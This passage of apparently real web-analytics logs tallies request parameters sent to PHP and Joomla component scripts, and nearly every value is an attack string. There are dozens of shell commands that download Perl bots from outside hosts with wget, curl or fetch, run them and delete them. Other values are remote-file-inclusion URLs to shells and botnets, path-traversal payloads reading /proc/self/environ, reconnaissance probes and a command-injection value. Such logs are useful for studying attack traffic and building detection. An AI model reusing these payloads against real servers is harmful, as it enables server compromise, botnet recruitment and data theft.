w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
5
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c
om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/
srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg
et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm
srz.txt
5
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet
ch http://189.24.36.96:9090/sta.txt;lwp-download http://189.
24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t
xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta
.txt?
4
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4
/srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;
lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu
rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http
://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf
srz.txt*
4
Parameter list
ValueAccesses
1 13
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 61
http://www.freewebs.com/sur00tseclan/httd.txt? 43
http://invisionar.hostinggratisargentina.com/eth0? 43
http://216.83.134.89/teste2bot.txt? 41
http://oon.web.id/r57? 39
http://www.oslutadores.com/?id=23530 36
http://www.freewebs.com/yahwek/sete.txt? 32
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 31
28
http://usuarios.arnet.com.ar/larry123/ka.txt? 28
Parameter path[docrs-for-live-51-de.html/skins/advanced/advanced1.php?
pluginpath[0]
ValueAccesses
http://www.stdr.xpg.com.br/compito? 1
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 2,561
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/xgallery/upgrade_album.php
2,999
Parameters by Submitted Value
Parameter GALLERY_BASEDIR
ValueAccesses
50
http://invisionar.hostinggratisargentina.com/eth0? 41
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 39
http://joaobenner.googlepages.com/script2.txt?? 33
http://ownsirc.googlepages.com/botnet.txt? 27
http://www.lordxpl.xpg.com.br/own.txt?? 26
http://yahwek.dll.googlepages.com/phpbot.txt? 23
http://normanzito.iespana.es/http.txt?? 21
http://yugifire.t35.com/tool25.txt? 21
http://www.stdr.xpg.com.br/priv8? 20
Parameter GALLERY_BASEDIRhttp://softhack.bravehost.com/themain.txt?
ValueAccesses
1
Parameter cmd
ValueAccesses
2
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
25
cd /tmp;rm bot1.txt;wget http://yugifire.t35.com/bot1.txt;fe
tch http://yugifire.t35.com/bot1.txt;lwp-download http://yug
ifire.t35.com/bot1.txt;curl -O http://yugifire.t35.com/bot1.
txt;lynx http://yugifire.t35.com/bot1.txt;perl bot1.txt
23
cd /tmp; wget http://intranet.2circolovimercate.it/intro//mo
dules/Forums/admin/scan.pl; curl -o scan.pl http://intranet.
2circolovimercate.it/intro//modules/Forums/admin/scan.pl; pe
rl scan.pl
10
uname -a; id 10
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
9
id 9
cd /tmp;wget http://deltaboogie.com/blog/modules/Forums/admi
n/kk.txt;perl kk.txt h4h4
9
cd /tmp;rm -rf bot.txt*;wget http://haddem.awardspace.com/bo
t.txt.txt;lwp-download http://haddem.awardspace.com/bot.txt;
fetch http://haddem.awardspace.com/bot.txt;curl -o bot.txt h
ttp://haddem.awardspace.com/bot.txt;GET http://haddem.awards
pace.com/bot.txt >bot.txt;lynx -source http://haddem.awardsp
ace.com/bot.txt >bot.txt;perl bot.txt;rm -rf bot.txt*
8
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
5
Parameter list
ValueAccesses
1 4
Parameter vid
ValueAccesses
41025634 1
OTHER: 2,582
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/xfsection/modify.php 2,972
Parameters by Submitted Value
Parameter *
ValueAccesses
http://www.superlab.jazztel.es/safe.gif? 8
http://77.90.4.28/safeon.txt?? 1
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
15
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt
14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
14
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
12
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
10
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
9
cd /tmp;killall -9 perl;wget http://72.1.85.234/1.txt;curl -
O http://72.1.85.234/1.txt;fetch http://72.1.85.234/1.txt;lw
p-download http://72.1.85.234/1.txt;wget http://72.1.85.234/
2.txt;curl -O http://72.1.85.234/2.txt;fetch http://72.1.85.
234/2.txt;lwp-download http://72.1.85.234/2.txt;wget http://
72.1.85.234/3.txt;curl -O http://72.1.85.234/3.txt;fetch htt
p://72.1.85.234/3.txt;lwp-download http://72.1.85.234/3.txt;
wget http://72.1.85.234/4.txt;curl -O http://72.1.85.234/4.t
xt;fetch http://72.1.85.234/4.txt;lwp-download http://72.1.8
5.234/4.txt;wget http://72.1.85.234/5.txt;curl -O http://72.
1.85.234/5.txt;fetch http://72.1.85.234/5.txt;lwp-download h
ttp://72.1.85.234/5.txt;wget http://72.1.85.234/6.txt;curl -
O http://72.1.85.234/6.txt;fetch http://72.1.85.234/6.txt;lw
p-download http://72.1.85.234/6.txt;perl 1.txt;perl 2.txt;pe
rl 3.txt;perl 4.txt;perl 5.txt;perl 6.txt;rm -rf *txt*
9
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
9
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
8
uname -a; id 6
Parameter dir_moduel
ValueAccesses
http://geocities.com/kiddiesSscript/injex.txt? 1
Parameter dir_module
ValueAccesses
http://jackzard.110mb.com/r57? 101
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 57
http://ownsirc.googlepages.com/botnet.txt? 48
http://www.oslutadores.com/?id=23530 34
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 32
http://www.freewebs.com/yahwek/sete.txt? 30
http://www.freewebs.com/yahwek/phpbot.txt? 29
http://invisionar.hostinggratisargentina.com/eth0? 28
http://www.jungo8949.co.kr/tool25.txt? 27
http://mensagenss.hospedagemdesite.com/tool25/tool25.dat? 24
Parameter dir_modulehttp://www.geocities.com/greencoolest/Eny.txt?
ValueAccesses
1
Parameter list
ValueAccesses
1 18
OTHER: 2,427
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_rsgallery/rsgallery
.html.php
2,871
Parameters by Submitted Value
Parameter
ValueAccesses
http://badmus.by.ru/id.txt? 1
Parameter ?v
ValueAccesses
1
Parameter cmd
ValueAccesses
cd /tmp;rm -rf ownz*;wget http://avastscript.kit.net/ownz.tx
t;lwp-download http://avastscript.kit.net/ownz.txt;fetch htt
p://avastscript.kit.net/ownz.txt;curl -o ownz.txt http://ava
stscript.kit.net/ownz.txt;GET http://avastscript.kit.net/own
z.txt >ownz.txt;lynx -source http://avastscript.kit.net/ownz
.txt >ownz.txt;perl ownz.txt;rm -rf ownz.txt*
13
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
12
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
11
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
11
uname -a; id 11
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
8
cd /tmp;rm botnet.txt;wget http://azume.zapto.org/botnet.txt
;fetch http://azume.zapto.org/botnet.txt;lwp-download http:/
/azume.zapto.org/botnet.txt;curl -O http://azume.zapto.org/b
otnet.txt;lynx http://azume.zapto.org/botnet.txt;perl botnet
.txt
7
cd /tmp;rm bot.txt;wget http://189.24.138.40/bot.txt;fetch h
ttp://189.24.138.40/bot.txt;lwp-download http://189.24.138.4
0/bot.txt;curl -O http://189.24.138.40/bot.txt;lynx http://1
89.24.138.40/bot.txt;perl bot.txt;rm -rf *.txt
7
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
6
cd /tmp;rm botnet.txt;wget http://fuckoff.no-ip.org/botnet.t
xt;fetch http://fuckoff.no-ip.org/botnet.txt;lwp-download ht
tp://fuckoff.no-ip.org/botnet.txt;curl -O http://fuckoff.no-
ip.org/botnet.txt;lynx http://fuckoff.no-ip.org/botnet.txt;p
erl botnet.txt
6
Parameter http://www.endro.de/stammbaum/media/thumbs/TumbsInfo.txt?
ValueAccesses
1
Parameter list
ValueAccesses
1 1
Parameter mosC4CMS.php?dir[inc]
ValueAccesses
http://www.ss3s.org/r57.txt? 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.jungo8949.co.kr/tool25.txt? 53
http://www.jolieloves.com/mori/cmd.txt? 47
http://189.23.251.131/~tiago/new.txt? 43
http://invisionar.hostinggratisargentina.com/eth0? 37
http://www.freewebs.com/yahwek/phpbot.txt? 33
http://usuarios.arnet.com.ar/larry123/safe.txt? 32
http://www.neoncomanda.kit.net/tool25.dat? 30
http://ownsirc.googlepages.com/botnet.txt? 29
http://www.oslutadores.com/?id=23530 28
24
Parameter mosConfig_absolute_pathhttp://usuarios.arnet.com.ar/adrikras
now/rfi/bla.txt?
ValueAccesses
2
OTHER: 2,416
ScriptTotal Accesses
/wusage/weekly/2008/09/07/ 2,773
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
2
Parameter _zb_path
ValueAccesses
http://www.aerothaiunion.com/sik.txt? 7
http://maehongson.nfe.go.th/budget3/image/id.jpg??? 4
http://51ucn.com/xjarea/shz/help01.txt????? 4
http://www.mfa.gov.bt/kethek-id.txt??? 3
http://www.j-vision.co.kr/company/hotel/index.php/bo.do?? 2
../../../../../../../../../../../../../../../../../../../../
../../../../proc/self/environ
2
http://barfod.no/modules/fx29id.txt?? 2
http://clubsuscriptores.eltiempo.com/templates_c/id.txt? 2
http://www.sbe.es/buggsbunny?? 2
http://www.aerothaiunion.com/sik.txt?? 2
Parameter abs_path
ValueAccesses
http://www.lazar.ru/manager/processors/copyright.txt??? 1
Parameter custompluginfile
ValueAccesses
http://basclan.org/idv6.txt????? 1
http://70.47.27.6/~autol/idv6.txt???? 1
http://huhta-tv.org/idv6.txt???? 1
Parameter custompluginfile[DOCUMENT_ROOT]
ValueAccesses
http://www.wemonmobila.info/mainlinks.dat?? 15
Parameter custompluginfile[]
ValueAccesses
http://www.nepspb.com/images/id6.txt???? 7
http://www.clansuche24.de/CMD.txt?? 4
http://vnc2009.webcindario.com/tst.txt?? 4
http://www.lazar.ru/manager/processors/copyright.txt??? 2
http://www.geocities.com/axenses/id.txt??? 2
http://shemouth.nimunet.com/irc/id.txt???? 2
http://vncx.webcindario.com/id.txt?? 1
http://www.thenakedtruckerandt-bones.com/reads.txt?? 1
http://www.hassenrasool.com/shop/cmd.php ?? 1
http://62.94.24.124/cerignola/home/CuteNews/id? 1
Parameter custompluginfile[]http://gabifir.yourfreehosting.net/2?
ValueAccesses
1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.mykr.net/bbs/id.txt?? 1
http://ambrosiasociety.org/zenphoto/cache/bo.do? ?? 1
http://www.mykr.net/bbs/id.txt? 1
http://ambrosiasociety.org/zenphoto/cache/bo.do??? 1
Parameter mosConfig_admin_path
ValueAccesses
http://cluster76.bannaipol.org/includes/chi.txt?? 1
http://oursoultvxq.com/bbs/data/bbs/chi.txt?? 1
Parameter option
ValueAccesses
com_poll 2
OTHER: 2,688
ScriptTotal Accesses
/wusage/weekly/2010/11/14/ 2,721
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 52
1 1
Parameter Option
ValueAccesses
com_myblog 34
com_google 6
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 324
../../../../../../../../../../../../../../../proc/self/envir
on
280
..//..//..//..//..//..//..//..///proc/self/environ 00 171
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
135
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
127
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
65
../../../../../../../../../../..//proc/self/environ 00 47
../../../../../../../../../../../../../../..//proc/self/envi
ron
35
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 29
//..//..//..//..//..//..//..//..///proc/self/environ 00 28
Parameter option
ValueAccesses
com_google 1,034
com_fabrik 190
com_myblog 56
com_goole 10
com_pcchess 4
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 26
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
17
../../../../../../../../../../../../../../../proc/self/envir
on
6
..//..//..//..//..//..//..//..///proc/self/environ 00 4
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
3
../../../../../../../../../../../../..//proc/self/environ 00
1
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
OTHER: 26
ScriptTotal Accesses
//// 2,688
Parameters by Submitted Value
Parameter CONFIG[main_path]
ValueAccesses
http://ourfathersworld.org/wp-content/themes/default/idxx.tx
t??
4
Parameter DOCUMENT_ROOT
ValueAccesses
http://vacancesgrandbornand.com/id1.php? 3
http://lnx.mp3dmultimediastudio.it/demo/id1?? 2
http://www.candidography.com/zero/id1.txt?? 2
http://www.imoralro.com.br/forum/public/style_css/css_2/id1.
txt???
2
http://www.medisite.fr/id???? 2
http://fpappalardo.com/logs/baner.txt?? 1
http://www.exorsl.com/cst//encurs/Roseid.txt?? 1
http://www.hongik.ac.kr/hq/data/Tuxid.txt? 1
http://oursoultvxq.com/bbs/data/vip/id2.txt??? 1
http://cocina.sur.es/editor/Idflp.txt? 1
Parameter DOCUMEN_ROOT[PATH]
ValueAccesses
http://www.howtolisten.kr//parti/data/admin/auto1.txt??? 2
Parameter GALLERY_BASEDIR
ValueAccesses
http://musicadelibreria.net/footer?? 1
Parameter Itemid
ValueAccesses
12 36
Parameter Option
ValueAccesses
com_rwcards 6
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://www.iheard.us/language/pdf_fonts/id1.txt?? 1
Parameter _PHPLIB[libdir]
ValueAccesses
http://gbdata.co.uk/images/zd1.txt???? 16
http://phamsight.com/docs/images/head?? 12
http://antigua.granada.notariado.org//includes/id1.txt? 9
http://www.wvblazers.com//administrator/components/com_virtu
emart/sql/other/c1.txt?
6
http://newtabe.110mb.com/identi.jpg? 4
http://www.clearpathhealingarts.com/logs/.log? 4
http://ourchat8.110mb.com/images/moncrot1.gif? 3
http://cnel.dongguk.ac.kr/zb41/bbs/skin/zero_cyan/.log? 2
http://www.tourgaja.net/www/data/sc1?? 2
http://www.reducereuserecycle.com.au/core/id1.txt?? 2
Parameter _SERVER[DOCUMENT_ROOT]
ValueAccesses
http://musicadelibreria.net/footer?? 61
http://phamsight.com/docs/images/head?? 38
http://alandar.net/www2/log1.txt? 29
|echo "casper";echo "kae";| 15
../../../../../../../../../../../../../../../proc/self/envir
on
15
http://aboutav.com//id1.txt??? 13
http://www.ohid.se/image?? 13
http://www.koreadefence.net/data/shirohige/zfxid.txt?? 13
http://valdes.fileave.com/scan/kil-9/idxx.txt??? 12
http://www.lifeuniv.com/tmp/copyright.txt?? 12
Parameter _gallery.php?_server[DOCUMENT_ROOT]
ValueAccesses
http://www.all3c.com///images/mono/20100907/app/functions/re
sponse.txt?
2
OTHER: 2,339
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/tinycontent/admin/spaw/spaw
_control.class.php
2,537
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter cmd
ValueAccesses
uname -a; id 16
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt*
14
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
11
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt*
7
id 7
cd /tmp;rm ng*;wget http://ownz-you.com/ng.txt;fetch http://
ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt;
curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/
ng.txt;perl ng.txt;rm -rf ng*
6
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
6
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per
l botx2.txt;rm -rf *txt*
5
cd /tmp;lwp-download http://www.019online.com/components/com
_rwcards/images/IND2.jpg;curl -O http://www.019online.com/co
mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli
ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg;
rm -rf *IND*
5
Parameter list
ValueAccesses
1 13
Parameter s
ValueAccesses
r 1
Parameter spaw_root
ValueAccesses
http://jorgevolio.com/.cookies/safe.gif? 100
http://ownsirc.googlepages.com/botnet.txt? 34
http://h1.ripway.com/tsk4/cmd.txt? 31
http://invisionar.hostinggratisargentina.com/eth0? 27
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 26
http://www.freewebs.com/yahwek/sete.txt? 26
http://www.oslutadores.com/?id=23530 25
http://www.freewebs.com/yahwek/phpbot.txt? 20
http://usuarios.arnet.com.ar/larry123/safe.txt? 20
http://www.superlab.jazztel.es/safe.gif? 18
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 2,104
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_galleria/galleria.h
tml.php
2,256
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 20
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
11
cd /tmp;rm -rf *;cd /tmp;lwp-download http://www1.freewebs.c
om/sur00tec/srz.txt;fetch http://www1.freewebs.com/sur00tec/
srz.txt;curl -o http://www1.freewebs.com/sur00tec/srz.txt;wg
et http://www1.freewebs.com/sur00tec/srz.txt;perl srz.txt;rm
srz.txt
7
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
6
id 6
cd /tmp;rm x.txt;wget http://189.6.162.125:8090/x.txt;fetch
http://189.6.162.125:8090/x.txt;lwp-download http://189.6.16
2.125:8090/x.txt;curl -O http://189.6.162.125:8090/x.txt;lyn
x http://189.6.162.125:8090/x.txt;perl x.txt
6
cd /tmp;wget http://www.iradex.kit.net/spk/spk.txt;curl -O h
ttp://www.iradex.kit.net/spk/spk.txt;lwp-download -a http://
www.iradex.kit.net/spk/spk.txt;GET http://www.iradex.kit.net
/spk/spk.txt;lynx -source http://www.iradex.kit.net/spk/spk.
txt;links -source http://www.iradex.kit.net/spk/spk.txt;perl
spk.txt;rm -rf spk.txt;rm -rf spk001.txt
3
cd /tmp;rm sur0.txt;wget http://71.41.190.203/sur0.txt;fetch
http://71.41.190.203/sur0.txt;lwp-download http://71.41.190
.203/sur0.txt;curl -O http://71.41.190.203/sur0.txt;lynx htt
p://71.41.190.203/sur0.txt;perl sur0.txt;rm -rf sur0.txt*
3
cd /tmp;wget http://www.iakh.de/oneadmin/calendar/ao.txt;cur
l -O -f http://www.iakh.de/oneadmin/calendar/ao.txt;lynx -so
urce http://www.iakh.de/oneadmin/calendar/ao.txt;lwp-rget ht
tp://www.iakh.de/oneadmin/calendar/ao.txt;fetch http://www.i
akh.de/oneadmin/calendar/ao.txtt;perl ao.txt;rm -rf ao.txt
3
Parameter list
ValueAccesses
1 13
Parameter mosConfig_absolute_path
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 41
http://www.jungo8949.co.kr/tool25.txt? 34
http://invisionar.hostinggratisargentina.com/eth0? 29
http://www.freewebs.com/yahwek/sete.txt? 28
http://usuarios.arnet.com.ar/larry123/safe.txt? 27
http://normanzito.iespana.es/http.txt?? 24
22
http://usuarios.arnet.com.ar/larry123/exploit.txt? 21
http://208.74.174.183/brizola.txt? 20
http://horyzonty.intarnet.pl/albums/userpics/.yop/safeon.txt
??
20
OTHER: 1,899
ScriptTotal Accesses
/wusage/weekly/2010/12/05/ 2,229
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 88
11 2
27 1
Parameter Option
ValueAccesses
com_myblog 58
com_google 6
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 354
../../../../../../../../../../../../../../../proc/self/envir
on
178
..//..//..//..//..//..//..//..///proc/self/environ 00 139
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
72
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
71
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
43
../../../../../../../../../../../../../../..//proc/self/envi
ron
38
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 24
//..//..//..//..//..//..//..//..///proc/self/environ 00 23
../../../../../../../../../../../../../../..//proc/self/envi
ron 00
15
Parameter option
ValueAccesses
com_google 792
com_fabrik 100
com_myblog 91
com_gcalendar 14
com_rokdownloads 6
com_product 2
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 39
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
30
..//..//..//..//..//..//..//..///proc/self/environ 00 16
../../../../../../../../../../../../../../../proc/self/envir
on
6
Parameter view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 6
OTHER: 11
ScriptTotal Accesses
/wusage/weekly/2010/11/21/ 2,196
Parameters by Submitted Value
Parameter Itemid
ValueAccesses
12 61
11 2
27 1
1 1
Parameter Option
ValueAccesses
com_myblog 54
com_myfiles 10
com_google 5
com_product 2
Parameter amp;view
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 00 4
Parameter controller
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 289
../../../../../../../../../../../../../../../proc/self/envir
on
214
..//..//..//..//..//..//..//..///proc/self/environ 00 148
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
135
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
proc/self/environ
60
..//..//..//..//..//..//..//..//..//..//..///proc/self/envir
on
55
../../../../../../../../../../../../../../..//proc/self/envi
ron
27
//..//..//..//..//..//..//..//..///proc/self/environ 00 16
..//..//..//..//..//..//..//..//..//..//..///proc/self/z3n 13
..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//
..//..//..//..//..//..//..//..//..///proc/self/environ 00
10
Parameter option
ValueAccesses
2
com_google 731
com_fabrik 148
com_myblog 62
com_rwcards 31
com_product 4
com_myfiles 4
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../../../../../../../../../../../../..//proc/self/envir
on 00
2
com_rwcards/?custompluginfile[]=../../../../../../../../../.
./../../..//proc/self/environ 00
2
Parameter task
ValueAccesses
..//..//..//..//..//..//..//..///proc/self/environ 30
../../../../../../../../../../../../../../../../../../../../
../../../..//proc/self/environ 00
21
../../../../../../../../../../../../../../../proc/self/envir
on
8
..//..//..//..//..//..//..//..///proc/self/environ 00 6
Parameter view
ValueAccesses
rwcards 23
..//..//..//..//..//..//..//..///proc/self/environ 00 5
OTHER: 10
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_extcalendar/admin_e
vents.php
2,192
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
5
Parameter CONFIG_EXT[LANGUAGES_DIR] http://human-design.ru/adm/faqsupp
ort/config/tester.txt?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR] http://www.apocalypticduck.com/ski
ns/advanced/config/tester.txt?
ValueAccesses
1
Parameter CONFIG_EXT[LANGUAGES_DIR] http://x-tal.ajou.ac.kr/zeroboard/
skin/zero_vote/tester.txt?
ValueAccesses
2
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://ch3z.max-host.pl/z/z/k.txt? 138
http://www.jungo8949.co.kr/tool25.txt? 74
http://www.hotelalpino.com.br/ferias/vnc/cmd/cmd.txt? 43
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/tester.txt?
37
http://invisionar.hostinggratisargentina.com/eth0? 34
33
http://usuarios.arnet.com.ar/larry123/safe.txt? 28
http://ownsirc.googlepages.com/botnet.txt? 27
http://www.freewebtown.com/johnkid/tester.txt? 26
http://chez.ugu.pl/z/z/k.txt? 26
